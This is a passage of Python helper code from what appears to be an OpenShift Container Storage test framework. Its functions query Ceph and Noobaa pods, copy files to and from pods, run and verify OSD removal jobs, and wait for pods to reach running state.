mdss = get_pods_having_label(mds_label, namespace)
mds_pods = [Pod(**mds) for mds in mdss]
return mds_pods
def get_mon_pods(mon_label=constants.MON_APP_LABEL, namespace=None):
"""
Fetches info about mon pods in the cluster
Args:
mon_label (str): label associated with mon pods
(default: defaults.MON_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : of mon pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
mons = get_pods_having_label(mon_label, namespace)
mon_pods = [Pod(**mon) for mon in mons]
return mon_pods
def get_mgr_pods(mgr_label=constants.MGR_APP_LABEL, namespace=None):
"""
Fetches info about mgr pods in the cluster
Args:
mgr_label (str): label associated with mgr pods
(default: defaults.MGR_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : of mgr pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
mgrs = get_pods_having_label(mgr_label, namespace)
mgr_pods = [Pod(**mgr) for mgr in mgrs]
return mgr_pods
def get_osd_pods(osd_label=constants.OSD_APP_LABEL, namespace=None):
"""
Fetches info about osd pods in the cluster
Args:
osd_label (str): label associated with osd pods
(default: defaults.OSD_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : of osd pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
osds = get_pods_having_label(osd_label, namespace)
osd_pods = [Pod(**osd) for osd in osds]
return osd_pods
def get_osd_prepare_pods(
osd_prepare_label=constants.OSD_PREPARE_APP_LABEL,
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
):
"""
Fetches info about osd prepare pods in the cluster
Args:
osd_prepare_label (str): label associated with osd prepare pods
(default: constants.OSD_PREPARE_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list: OSD prepare pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
osds = get_pods_having_label(osd_prepare_label, namespace)
osd_pods = [Pod(**osd) for osd in osds]
return osd_pods
def get_osd_deployments(osd_label=constants.OSD_APP_LABEL, namespace=None):
"""
Fetches info about osd deployments in the cluster
Args:
osd_label (str): label associated with osd deployments
(default: defaults.OSD_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list: OSD deployment OCS instances
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
osds = get_deployments_having_label(osd_label, namespace)
osd_deployments = [OCS(**osd) for osd in osds]
return osd_deployments
def get_pod_count(label, namespace=None):
namespace = namespace or config.ENV_DATA["cluster_namespace"]
pods = get_pods_having_label(label=label, namespace=namespace)
return len(pods)
def get_cephfsplugin_provisioner_pods(
cephfsplugin_provisioner_label=constants.CSI_CEPHFSPLUGIN_PROVISIONER_LABEL,
namespace=None,
):
"""
Fetches info about CSI Cephfs plugin provisioner pods in the cluster
Args:
cephfsplugin_provisioner_label (str): label associated with cephfs
provisioner pods
(default: defaults.CSI_CEPHFSPLUGIN_PROVISIONER_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : csi-cephfsplugin-provisioner Pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
pods = get_pods_having_label(cephfsplugin_provisioner_label, namespace)
fs_plugin_pods = [Pod(**pod) for pod in pods]
return fs_plugin_pods
def get_rbdfsplugin_provisioner_pods(
rbdplugin_provisioner_label=constants.CSI_RBDPLUGIN_PROVISIONER_LABEL,
namespace=None,
):
"""
Fetches info about CSI Cephfs plugin provisioner pods in the cluster
Args:
rbdplugin_provisioner_label (str): label associated with RBD
provisioner pods
(default: defaults.CSI_RBDPLUGIN_PROVISIONER_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : csi-rbdplugin-provisioner Pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
pods = get_pods_having_label(rbdplugin_provisioner_label, namespace)
ebd_plugin_pods = [Pod(**pod) for pod in pods]
return ebd_plugin_pods
def get_pod_obj(name, namespace=None):
"""
Returns the pod obj for the given pod
Args:
name (str): Name of the resources
Returns:
obj : A pod object
"""
ocp_obj = OCP(api_version="v1", kind=constants.POD, namespace=namespace)
ocp_dict = ocp_obj.get(resource_name=name)
pod_obj = Pod(**ocp_dict)
return pod_obj
def get_pod_logs(
pod_name, container=None, namespace=defaults.ROOK_CLUSTER_NAMESPACE, previous=False
):
"""
Get logs from a given pod
pod_name (str): Name of the pod
container (str): Name of the container
namespace (str): Namespace of the pod
previous (bool): True, if pod previous log required. False otherwise.
Returns:
str: Output from 'oc get logs <pod_name> command
"""
pod = OCP(kind=constants.POD, namespace=namespace)
cmd = f"logs {pod_name}"
if container:
cmd += f" -c {container}"
if previous:
cmd += " --previous"
return pod.exec_oc_cmd(cmd, out_yaml_format=False)
def get_pod_node(pod_obj):
"""
Get the node that the pod is running on
Args:
pod_obj (OCS): The pod object
Returns:
ocs_ci.ocs.ocp.OCP: The node object
"""
node_name = pod_obj.get().get("spec").get("nodeName")
return node.get_node_objs(node_names=node_name)[0]
def delete_pods(pod_objs, wait=True):
"""
Deletes list of the pod objects
Args:
pod_objs (list): List of the pod objects to be deleted
wait (bool): Determines if the delete command should wait for
completion
"""
for pod in pod_objs:
pod.delete(wait=wait)
def validate_pods_are_respinned_and_running_state(pod_objs_list):
"""
Verifies the list of the pods are respinned and in running state
Args:
pod_objs_list (list): List of the pods obj
Returns:
bool : True if the pods are respinned and running, False otherwise
Raises:
ResourceWrongStatusException: In case the resources hasn't
reached the Running state
"""
for pod in pod_objs_list:
helpers.wait_for_resource_state(pod, constants.STATUS_RUNNING, timeout=180)
for pod in pod_objs_list:
pod_obj = pod.get()
start_time = pod_obj["status"]["startTime"]
ts = time.strptime(start_time, "%Y-%m-%dT%H:%M:%SZ")
ts = calendar.timegm(ts)
current_time_utc = time.time()
sec = current_time_utc - ts
if (sec / 3600) >= 1:
logger.error(
f"Pod {pod.name} is not respinned, the age of the pod is {start_time}"
)
return False
return True
def verify_node_name(pod_obj, node_name):
"""
Verifies that the pod is running on a particular node
Args:
pod_obj (Pod): The pod object
node_name (str): The name of node to check
Returns:
bool: True if the pod is running on a particular node, False otherwise
"""
logger.info(
f"Checking whether the pod {pod_obj.name} is running on " f"node {node_name}"
)
actual_node = pod_obj.get().get("spec").get("nodeName")
if actual_node == node_name:
logger.info(
f"The pod {pod_obj.name} is running on the specified node " f"{actual_node}"
)
return True
else:
logger.info(
f"The pod {pod_obj.name} is not running on the specified node "
f"specified node: {node_name}, actual node: {actual_node}"
)
return False
def get_pvc_name(pod_obj):
"""
Function to get pvc_name from pod_obj
Args:
pod_obj (str): The pod object
Returns:
str: The pvc name of a given pod_obj,
Raises:
UnavailableResourceException: If no pvc attached
"""
pvc = pod_obj.get().get("spec").get("volumes")[0].get("persistentVolumeClaim")
if not pvc:
raise UnavailableResourceException
return pvc.get("claimName")
def get_used_space_on_mount_point(pod_obj):
"""
Get the used space on a mount point
Args:
pod_obj (POD): The pod object
Returns:
int: Percentage represent the used space on the mount point
"""
# Verify data's are written to mount-point
mount_point = pod_obj.exec_cmd_on_pod(command="df -kh")
mount_point = mount_point.split()
used_percentage = mount_point[mount_point.index(constants.MOUNT_POINT) - 1]
return used_percentage
def get_plugin_pods(interface, namespace=None):
"""
Fetches info of csi-cephfsplugin pods or csi-rbdplugin pods
Args:
interface (str): Interface type. eg: CephBlockPool, CephFileSystem
namespace (str): Name of cluster namespace
Returns:
list : csi-cephfsplugin pod objects or csi-rbdplugin pod objects
"""
if interface == constants.CEPHFILESYSTEM:
plugin_label = constants.CSI_CEPHFSPLUGIN_LABEL
if interface == constants.CEPHBLOCKPOOL:
plugin_label = constants.CSI_RBDPLUGIN_LABEL
namespace = namespace or config.ENV_DATA["cluster_namespace"]
plugins_info = get_pods_having_label(plugin_label, namespace)
plugin_pods = [Pod(**plugin) for plugin in plugins_info]
return plugin_pods
def get_plugin_provisioner_leader(interface, namespace=None, leader_type="provisioner"):
"""
Get csi-cephfsplugin-provisioner or csi-rbdplugin-provisioner leader pod
Args:
interface (str): Interface type. eg: CephBlockPool, CephFileSystem
namespace (str): Name of cluster namespace
leader_type (str): Parameter to check the lease. eg: 'snapshotter' to
select external-snapshotter leader holder
Returns:
Pod: csi-cephfsplugin-provisioner or csi-rbdplugin-provisioner leader
pod
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
leader_types = {
"provisioner": namespace,
"snapshotter": f"external-snapshotter-leader-{namespace}",
"resizer": f"external-resizer-{namespace}",
"attacher": f"external-attacher-{namespace}",
}
if interface == constants.CEPHBLOCKPOOL:
lease_cmd = f"get leases {leader_types[leader_type]}-rbd-csi-ceph-com -o yaml"
elif interface == constants.CEPHFILESYSTEM:
lease_cmd = (
f"get leases {leader_types[leader_type]}-cephfs-csi-ceph-com " "-o yaml"
)
ocp_obj = ocp.OCP(kind=constants.POD, namespace=namespace)
lease = ocp_obj.exec_oc_cmd(command=lease_cmd)
leader = lease.get("spec").get("holderIdentity").strip()
assert leader, "Couldn't identify plugin provisioner leader pod."
logger.info(f"Plugin provisioner leader pod is {leader}")
ocp_obj._resource_name = leader
leader_pod = Pod(**ocp_obj.get())
return leader_pod
def get_operator_pods(operator_label=constants.OPERATOR_LABEL, namespace=None):
"""
Fetches info about rook-ceph-operator pods in the cluster
Args:
operator_label (str): Label associated with rook-ceph-operator pod
namespace (str): Namespace in which ceph cluster lives
Returns:
list : of rook-ceph-operator pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
operators = get_pods_having_label(operator_label, namespace)
operator_pods = [Pod(**operator) for operator in operators]
return operator_pods
def upload(pod_name, localpath, remotepath, namespace=None):
"""
Upload a file to pod
Args:
pod_name (str): Name of the pod
localpath (str): Local file to upload
remotepath (str): Target path on the pod
"""
namespace = namespace or constants.DEFAULT_NAMESPACE
cmd = (
f"oc -n {namespace} cp {os.path.expanduser(localpath)} {pod_name}:{remotepath}"
)
run_cmd(cmd)
def download_file_from_pod(pod_name, remotepath, localpath, namespace=None):
"""
Download a file from a pod
Args:
pod_name (str): Name of the pod
remotepath (str): Target path on the pod
localpath (str): Local file to upload
namespace (str): The namespace of the pod
"""
namespace = namespace or constants.DEFAULT_NAMESPACE
cmd = (
f"oc -n {namespace} cp {pod_name}:{remotepath} {os.path.expanduser(localpath)}"
)
run_cmd(cmd)
def wait_for_storage_pods(timeout=200):
"""
Check all OCS pods status, they should be in Running or Completed state
Args:
timeout (int): Number of seconds to wait for pods to get into correct
state
"""
all_pod_obj = get_all_pods(namespace=defaults.ROOK_CLUSTER_NAMESPACE)
# Ignoring pods with "app=rook-ceph-detect-version" app label
all_pod_obj = [
pod
for pod in all_pod_obj
if pod.get_labels()
and constants.ROOK_CEPH_DETECT_VERSION_LABEL not in pod.get_labels()
]
for pod_obj in all_pod_obj:
state = constants.STATUS_RUNNING
if any(i in pod_obj.name for i in ["-1-deploy", "ocs-deviceset"]):
state = constants.STATUS_COMPLETED
try:
helpers.wait_for_resource_state(
resource=pod_obj, state=state, timeout=timeout
)
except ResourceWrongStatusException:
# 'rook-ceph-crashcollector' on the failed node stucks at
# pending state. BZ 1810014 tracks it.
# Ignoring 'rook-ceph-crashcollector' pod health check as
# WA and deleting its deployment so that the pod
# disappears. Will revert this WA once the BZ is fixed
if "rook-ceph-crashcollector" in pod_obj.name:
ocp_obj = ocp.OCP(namespace=defaults.ROOK_CLUSTER_NAMESPACE)
pod_name = pod_obj.name
deployment_name = "-".join(pod_name.split("-")[:-2])
command = f"delete deployment {deployment_name}"
ocp_obj.exec_oc_cmd(command=command)
logger.info(f"Deleted deployment for pod {pod_obj.name}")
else:
raise
def verify_pods_upgraded(old_images, selector, count=1, timeout=720):
"""
Verify that all pods do not have old image.
Args:
old_images (set): Set with old images.
selector (str): Selector (e.g. app=ocs-osd)
count (int): Number of resources for selector.
timeout (int): Timeout in seconds to wait for pods to be upgraded.
Raises:
TimeoutException: If the pods didn't get upgraded till the timeout.
"""
namespace = config.ENV_DATA["cluster_namespace"]
pod = OCP(
kind=constants.POD,
namespace=namespace,
)
info_message = (
f"Waiting for {count} pods with selector: {selector} to be running "
f"and upgraded."
)
logger.info(info_message)
start_time = time.time()
selector_label, selector_value = selector.split("=")
while True:
pod_count = 0
try:
pods = get_all_pods(namespace, [selector_value], selector_label)
pods_len = len(pods)
logger.info(f"Found {pods_len} pod(s) for selector: {selector}")
if pods_len != count:
logger.warning(
f"Number of found pods {pods_len} is not as expected: " f"{count}"
)
for pod in pods:
verify_images_upgraded(old_images, pod.get())
pod_count += 1
except CommandFailed as ex:
logger.warning(
f"Failed when getting pods with selector {selector}." f"Error: {ex}"
)
except NonUpgradedImagesFoundError as ex:
logger.warning(ex)
check_timeout_reached(start_time, timeout, info_message)
if pods_len != count:
logger.error(f"Found pods: {pods_len} but expected: {count}!")
elif pod_count == count:
return
def get_noobaa_pods(noobaa_label=constants.NOOBAA_APP_LABEL, namespace=None):
"""
Fetches info about noobaa pods in the cluster
Args:
noobaa_label (str): label associated with osd pods
(default: defaults.NOOBAA_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : of noobaa pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
noobaas = get_pods_having_label(noobaa_label, namespace)
noobaa_pods = [Pod(**noobaa) for noobaa in noobaas]
return noobaa_pods
def wait_for_dc_app_pods_to_reach_running_state(
dc_pod_obj, timeout=120, exclude_state=None
):
"""
Wait for DC app pods to reach running state
Args:
dc_pod_obj (list): list of dc app pod objects
timeout (int): Timeout in seconds to wait for pods to be in Running
state.
exclude_state (str): A resource state to ignore
"""
for pod_obj in dc_pod_obj:
name = pod_obj.get_labels().get("name")
dpod_list = get_all_pods(selector_label=f"name={name}", wait=True)
for dpod in dpod_list:
if "-1-deploy" not in dpod.name and dpod.status != exclude_state:
helpers.wait_for_resource_state(
dpod, constants.STATUS_RUNNING, timeout=timeout
)
def delete_deploymentconfig_pods(pod_obj):
"""
Delete a DeploymentConfig pod and all the pods that are controlled by it
Args:
pod_obj (Pod): Pod object
"""
dc_ocp_obj = ocp.OCP(kind=constants.DEPLOYMENTCONFIG, namespace=pod_obj.namespace)
pod_data_list = dc_ocp_obj.get().get("items")
if pod_data_list:
for pod_data in pod_data_list:
if pod_obj.get_labels().get("name") == pod_data.get("metadata").get("name"):
dc_ocp_obj.delete(resource_name=pod_obj.get_labels().get("name"))
dc_ocp_obj.wait_for_delete(
resource_name=pod_obj.get_labels().get("name")
)
def wait_for_new_osd_pods_to_come_up(number_of_osd_pods_before):
status_options = ["Init:1/4", "Init:2/4", "Init:3/4", "PodInitializing", "Running"]
try:
for osd_pods in TimeoutSampler(timeout=180, sleep=3, func=get_osd_pods):
# Check if the new osd pods has started to come up
new_osd_pods = osd_pods[number_of_osd_pods_before:]
new_osd_pods_come_up = [
pod.status() in status_options for pod in new_osd_pods
]
if any(new_osd_pods_come_up):
logging.info("One or more of the new osd pods has started to come up")
break
except TimeoutExpiredError:
logging.warning("None of the new osd pods reached the desired status")
def get_pod_restarts_count(namespace=defaults.ROOK_CLUSTER_NAMESPACE):
"""
Gets the dictionary of pod and its restart count for all the pods in a given namespace
Returns:
dict: dictionary of pod name and its corresponding restart count
"""
list_of_pods = get_all_pods(namespace)
restart_dict = {}
ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
for p in list_of_pods:
# we don't want to compare osd-prepare and canary pods as they get created freshly when an osd need to be added.
if (
"rook-ceph-osd-prepare" not in p.name
and "rook-ceph-drain-canary" not in p.name
):
restart_dict[p.name] = int(ocp_pod_obj.get_resource(p.name, "RESTARTS"))
logging.info(f"get_pod_restarts_count: restarts dict = {restart_dict}")
return restart_dict
def check_pods_in_running_state(
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
pod_names=None,
raise_pod_not_found_error=False,
):
"""
checks whether all the pods in a given namespace are in Running state or not
Args:
namespace (str): Name of cluster namespace(default: defaults.ROOK_CLUSTER_NAMESPACE)
pod_names (list): List of the pod names to check.
If not provided, it will check all the pods in the given namespace
raise_pod_not_found_error (bool): If True, it raises an exception, if one of the pods
in the pod names are not found. If False, it ignores the case of pod not found and
returns the pod objects of the rest of the pod names. The default value is False
Returns:
Boolean: True, if all pods in Running state. False, otherwise
"""
ret_val = True
if pod_names:
list_of_pods = get_pod_objs(pod_names, raise_pod_not_found_error)
else:
list_of_pods = get_all_pods(namespace)
ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
for p in list_of_pods:
# we don't want to compare osd-prepare and canary pods as they get created freshly when an osd need to be added.
if (
"rook-ceph-osd-prepare" not in p.name
and "rook-ceph-drain-canary" not in p.name
):
status = ocp_pod_obj.get_resource(p.name, "STATUS")
if (
("rook-ceph-osd-prepare" not in p.name)
and ("rook-ceph-drain-canary" not in p.name)
and ("debug" not in p.name)
):
status = ocp_pod_obj.get_resource(p.name, "STATUS")
if status not in "Running":
logging.error(
f"The pod {p.name} is in {status} state. Expected = Running"
)
ret_val = False
return ret_val
def get_running_state_pods(namespace=defaults.ROOK_CLUSTER_NAMESPACE):
"""
Checks the running state pods in a given namespace.
Returns:
List: all the pod objects that are in running state only
"""
list_of_pods = get_all_pods(namespace)
ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
running_pods_object = list()
for pod in list_of_pods:
status = ocp_pod_obj.get_resource(pod.name, "STATUS")
if "Running" in status:
running_pods_object.append(pod)
return running_pods_object
def wait_for_pods_to_be_running(
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
pod_names=None,
raise_pod_not_found_error=False,
timeout=200,
sleep=10,
):
"""
Wait for all the pods in a specific namespace to be running.
Args:
namespace (str): the namespace ot the pods
pod_names (list): List of the pod names to check.
If not provided, it will check all the pods in the given namespace
raise_pod_not_found_error (bool): If True, it raises an exception(in the function
'check_pods_in_running_state'), if one of the pods in the pod names are not found.
If False, it ignores the case of pod not found and returns the pod objects of
the rest of the pod names. The default value is False
timeout (int): time to wait for pods to be running
sleep (int): Time in seconds to sleep between attempts
Returns:
bool: True, if all pods in Running state. False, otherwise
"""
try:
for pods_running in TimeoutSampler(
timeout=timeout,
sleep=sleep,
func=check_pods_in_running_state,
namespace=namespace,
pod_names=pod_names,
raise_pod_not_found_error=raise_pod_not_found_error,
):
# Check if all the pods in running state
if pods_running:
logging.info("All the pods reached status running!")
return True
except TimeoutExpiredError:
logging.warning(
f"Not all the pods reached status running " f"after {timeout} seconds"
)
return False
def list_of_nodes_running_pods(selector, namespace=defaults.ROOK_CLUSTER_NAMESPACE):
"""
The function returns the list of nodes for the given selector
Args:
selector (str): The resource selector to search with
Returns:
list: a list of nodes that runs the given selector pods
"""
pod_obj_list = get_all_pods(namespace=namespace, selector=[selector])
pods_running_nodes = [get_pod_node(pod) for pod in pod_obj_list]
logger.info(f"{selector} running on nodes {pods_running_nodes}")
return list(set(pods_running_nodes))
def get_osd_removal_pod_name(osd_id, timeout=60):
"""
Get the osd removal pod name
Args:
osd_id (int): The osd's id to get the osd removal pod name
timeout (int): The time to wait for getting the osd removal pod name
Returns:
str: The osd removal pod name
"""
ocs_version = config.ENV_DATA["ocs_version"]
if Version.coerce(ocs_version) == Version.coerce("4.7"):
pattern = "ocs-osd-removal-job"
elif Version.coerce(ocs_version) == Version.coerce("4.8"):
pattern = "ocs-osd-removal-"
else:
pattern = f"ocs-osd-removal-{osd_id}"
try:
for osd_removal_pod_names in TimeoutSampler(
timeout=timeout,
sleep=5,
func=get_pod_name_by_pattern,
pattern=pattern,
):
if osd_removal_pod_names:
osd_removal_pod_name = osd_removal_pod_names[0]
logging.info(f"Found pod {osd_removal_pod_name}")
return osd_removal_pod_name
except TimeoutExpiredError:
logger.warning(f"Failed to get pod by the pattern {pattern}")
return None
def check_toleration_on_pods(toleration_key=constants.TOLERATION_KEY):
"""
Function to check toleration on pods
Args:
toleration_key (str): The toleration key to check
"""
pod_objs = get_all_pods(
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
selector=[constants.TOOL_APP_LABEL],
exclude_selector=True,
)
flag = False
for pod_obj in pod_objs:
resource_name = pod_obj.name
tolerations = pod_obj.get().get("spec").get("tolerations")
for key in tolerations:
if key["key"] == toleration_key:
flag = True
if flag:
logger.info(f"The Toleration {toleration_key} exists on {resource_name}")
else:
logger.error(
f"The pod {resource_name} does not have toleration {toleration_key}"
)
def run_osd_removal_job(osd_ids=None):
"""
Run the ocs-osd-removal job
Args:
osd_ids (list): The osd IDs.
Returns:
ocs_ci.ocs.resources.ocs.OCS: The ocs-osd-removal job object
"""
osd_ids_str = ",".join(map(str, osd_ids))
ocp_version = get_ocp_version()
if Version.coerce(ocp_version) >= Version.coerce("4.6"):
cmd = f"process ocs-osd-removal -p FAILED_OSD_IDS={osd_ids_str} -o yaml"
else:
cmd = f"process ocs-osd-removal -p FAILED_OSD_ID={osd_ids_str} -o yaml"
logger.info(f"Executing OSD removal job on OSD ids: {osd_ids_str}")
ocp_obj = ocp.OCP(namespace=defaults.ROOK_CLUSTER_NAMESPACE)
osd_removal_job_yaml = ocp_obj.exec_oc_cmd(cmd)
# Add the namespace param, so that the ocs-osd-removal job will be created in the correct namespace
osd_removal_job_yaml["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
osd_removal_job = OCS(**osd_removal_job_yaml)
osd_removal_job.create(do_reload=False)
return osd_removal_job
def verify_osd_removal_job_completed_successfully(osd_id):
"""
Verify that the ocs-osd-removal job completed successfully
Args:
osd_id (str): The osd id
Returns:
bool: True, if the ocs-osd-removal job completed successfully. False, otherwise
"""
logger.info("Getting the ocs-osd-removal pod name")
osd_removal_pod_name = get_osd_removal_pod_name(osd_id)
osd_removal_pod_obj = get_pod_obj(
osd_removal_pod_name, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
timeout = 300
try:
is_completed = osd_removal_pod_obj.ocp.wait_for_resource(
condition=constants.STATUS_COMPLETED,
resource_name=osd_removal_pod_name,
sleep=20,
timeout=timeout,
)
# Don't failed the test yet if the ocs-osd-removal pod job is not completed
except TimeoutExpiredError:
is_completed = False
ocp_pod_obj = OCP(kind=constants.POD, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
osd_removal_pod_status = ocp_pod_obj.get_resource_status(osd_removal_pod_name)
# Check if 'osd_removal_pod' is in status 'completed'
if not is_completed and osd_removal_pod_status != constants.STATUS_COMPLETED:
if osd_removal_pod_status != constants.STATUS_RUNNING:
logger.info(
f"ocs-osd-removal pod job did not reach status '{constants.STATUS_COMPLETED}' "
f"or '{constants.STATUS_RUNNING}' after {timeout} seconds"
)
return False
else:
logger.info(
f"ocs-osd-removal pod job reached status '{constants.STATUS_RUNNING}',"
f" but we were waiting for status '{constants.STATUS_COMPLETED}' "
)
new_timeout = 900
logger.info(
f"Wait more {new_timeout} seconds for ocs-osd-removal pod job to be completed"
)
is_completed = osd_removal_pod_obj.ocp.wait_for_resource(
condition=constants.STATUS_COMPLETED,
resource_name=osd_removal_pod_name,
sleep=30,
timeout=new_timeout,
)
if not is_completed:
logger.info(
f"ocs-osd-removal pod job did not complete after {new_timeout} seconds"
)
return False
# Verify OSD removal from the ocs-osd-removal pod logs
logger.info(f"Verifying removal of OSD from {osd_removal_pod_name} pod logs")
logs = get_pod_logs(osd_removal_pod_name)
pattern = f"purged osd.{osd_id}"
if not re.search(pattern, logs):
logger.warning(
f"Didn't find the removal of OSD from {osd_removal_pod_name} pod logs"
)
return False
return True
def delete_osd_removal_job(osd_id):
"""
Delete the ocs-osd-removal job.
Args:
osd_id (str): The osd id
Returns:
bool: True, if the ocs-osd-removal job deleted successfully. False, otherwise
"""
ocs_version = config.ENV_DATA["ocs_version"]
if Version.coerce(ocs_version) >= Version.coerce("4.7"):
job_name = "ocs-osd-removal-job"
else:
job_name = f"ocs-osd-removal-{osd_id}"
osd_removal_job = get_job_obj(job_name, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
osd_removal_job.delete()
try:
osd_removal_job.ocp.wait_for_delete(resource_name=job_name)
except TimeoutError:
logger.warning(f"{job_name} job did not get deleted successfully")
return False
return True
def get_deployment_name(pod_name):
"""
Get the deployment of the pod.
Args:
pod_name (str): The pod's name.
Returns:
The deployment of the specific pod name
"""
return "-".join(pod_name.split("-")[:-2])
def get_osd_pod_id(osd_pod):
"""
Get the osd pod id
Args:
osd_pod (ocs_ci.ocs.resources.pod.Pod): The osd pod object
Returns:
str: The osd pod id
"""
return osd_pod.get().get("metadata").get("labels").get("ceph-osd-id")
def get_pods_in_statuses(status_options, namespace=defaults.ROOK_CLUSTER_NAMESPACE):
"""
Get all the pods in specific statuses
Args:
status_options (list): The list of the status options.
namespace (str): Name of cluster namespace(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list: All the pods that their status in the 'status_options' list.
"""
pods = get_all_pods(namespace)
ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
pods_in_status_options = list()
for p in pods:
pod_status = ocp_pod_obj.get_resource_status(p.name)
if pod_status in status_options:
pods_in_status_options.append(p)
return pods_in_status_options
def get_pod_ceph_daemon_type(pod_obj):
"""
Get the ceph daemon type of the pod object
Args:
pod_obj (Pod): the pod object
Returns:
str: The pod's ceph daemon type
"""
return pod_obj.get_labels().get("ceph_daemon_type")
def check_pods_after_node_replacement():
"""
Check the pods status after the node replacement process.
Returns:
bool: True if all the pods are running after a specific time. False otherwise.
"""
are_pods_running = wait_for_pods_to_be_running(timeout=180)
if are_pods_running:
return True
not_ready_statuses = [
constants.STATUS_ERROR,
constants.STATUS_PENDING,
constants.STATUS_CLBO,
constants.STATUS_TERMINATING,
]
pods_not_ready = get_pods_in_statuses(status_options=not_ready_statuses)
if len(pods_not_ready) == 0:
logger.info("All the pods are running")
return True
if len(pods_not_ready) > 1:
logger.warning("More than one pod is not running")
return False
# if len(pods_not_ready) == 1
pod_not_ready = pods_not_ready[0]
pod_daemon_type = get_pod_ceph_daemon_type(pod_not_ready)
if pod_daemon_type == constants.MON_DAEMON:
logger.info(
f"One of the '{pod_daemon_type}' pods is not running, "
f"but all the other pods are running"
)
timeout = 1500
logger.info(
f"waiting another {timeout} seconds for all the pods to be running..."
)
are_pods_running = wait_for_pods_to_be_running(timeout=timeout, sleep=30)
if are_pods_running:
logger.info("All the pods are running")
return True
else:
logger.warning(
f"Not all the pods are in a running state after {timeout} seconds"
)
return False
else:
logger.warning(f"One of the '{pod_daemon_type}' pods is not running")
return False
def get_osd_pods_having_ids(osd_ids):
"""
Get the osd pods having specific ids
Args:
osd_ids (list): The list of the osd ids
Returns:
list: The osd pods having the osd ids
"""
# Convert it to set to reduce complexity
osd_ids_set = set(osd_ids)
osd_pods_having_ids = []
osd_pods = get_osd_pods()
for osd_pod in osd_pods:
if get_osd_pod_id(osd_pod) in osd_ids_set:
osd_pods_having_ids.append(osd_pod)
return osd_pods_having_ids
def get_pod_objs(
pod_names,
raise_pod_not_found_error=False,
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
):
"""
Get the pod objects of the specified pod names
Args:
pod_names (list): The list of the pod names to get their pod objects
namespace (str): Name of cluster namespace(default: defaults.ROOK_CLUSTER_NAMESPACE)
raise_pod_not_found_error (bool): If True, it raises an exception, if one of the pods
in the pod names are not found. If False, it ignores the case of pod not found and
returns the pod objects of the rest of the pod names. The default value is False
Returns:
list: The pod objects of the specified pod names
Raises:
ResourceNotFoundError: If 'raise_pod_not_found_error' is True,
and not all the pod names were found
"""
# Convert it to set to reduce complexity
pod_names_set = set(pod_names)
pods = get_all_pods(namespace=namespace)
pod_objs_found = [p for p in pods if p.name in pod_names_set]
if len(pod_names) > len(pod_objs_found):
pod_names_found_set = {p.name for p in pod_objs_found}
pod_names_not_found = list(pod_names_set - pod_names_found_set)
error_message = f"Did not find the following pod names: {pod_names_not_found}"
if raise_pod_not_found_error:
raise ResourceNotFoundError(error_message)
else:
logger.info(error_message)
return pod_objs_found
def wait_for_change_in_pods_statuses(
pod_names,
current_statuses=None,
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
timeout=300,
sleep=20,
):
"""
Wait for the pod statuses in a specific namespace to change.
Args:
pod_names (list): List of the pod names to check if their status changed.
namespace (str): the namespace ot the pods
current_statuses (list): The current pod statuses. These are the pod statuses
to check if they changed during each iteration.
timeout (int): time to wait for pod statuses to change
sleep (int): Time in seconds to sleep between attempts
Returns:
bool: True, if the pod statuses have changed. False, otherwise
"""
if current_statuses is None:
# If 'current_statuses' is None the default value will be the ready statues
current_statuses = [constants.STATUS_RUNNING, constants.STATUS_COMPLETED]
try:
for pod_objs in TimeoutSampler(
timeout=timeout,
sleep=sleep,
func=get_pod_objs,
namespace=namespace,
pod_names=pod_names,
):
ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
if len(pod_objs) < len(pod_names):
pod_names_found_set = {p.name for p in pod_objs}
pod_names_not_found = list(set(pod_names) - pod_names_found_set)
logger.info(f"Some of the pods have not found: {pod_names_not_found}")
return True
for p in pod_objs:
try:
pod_status = ocp_pod_obj.get_resource_status(p.name)
except CommandFailed as ex:
logger.info(
f"Can't get the status of the pod {p.name} due to the error: {ex}"
)
continue
if pod_status not in current_statuses:
logger.info(
f"The status of the pod '{p.name}' has changed to '{pod_status}'"
)
return True
except TimeoutExpiredError:
logging.info(f"The status of the pods did not change after {timeout} seconds")
return False
def get_rook_ceph_pod_names():
"""
Get all the rook ceph pod names
Returns:
